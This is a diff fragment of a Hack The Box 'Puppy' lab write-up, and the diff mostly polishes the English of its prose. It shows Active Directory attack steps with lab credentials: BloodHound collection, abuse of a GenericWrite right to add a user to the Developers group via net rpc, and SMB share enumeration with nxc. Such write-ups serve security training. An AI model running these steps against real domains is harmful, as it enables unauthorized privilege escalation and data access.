meringue7/Writeups/HTB/Puppy/Puppy.md

 # # bloodhound.py --zip -c All -u 'levi.james' -p 'KingofAkron2025!' -dc DC.puppy.htb -d puppy.htb -ns 10.129.232.75
 ```

-`levi.james` is member of the `HR` group which hash `GenericWright` privilege on the `Developpers` group.
+`levi.james` is a member of the `HR` group which has the `GenericWright` privilege on the `Developers` group.

 ![](img/levi.james.png)

-With this right, I can add `levi.james` to the `Developpers` group.
+This privilege allows me to add `levi.james` to the `Developers` group.

 ```bash
 # net rpc group addmem "developers" "levi.james" -U "PUPPY.HTB"/"levi.james" -S 10.129.232.75  Password for [PUPPY.HTB\levi.james]:
 ```

-This group give no more privileges to escalate.
+This group provides no further privileges for escalation.

 # Finding keepass file in `DEV` share

-Enumerating SMB shows me `levi.james` can now read in the `DEV` share.
+SMB enumeration reveals that `levi.james` now has read access to the `DEV` share.

 ```bash
 # nxc smb 10.10.11.70 -u 'levi.james' -p 'KingofAkron2025!' --shares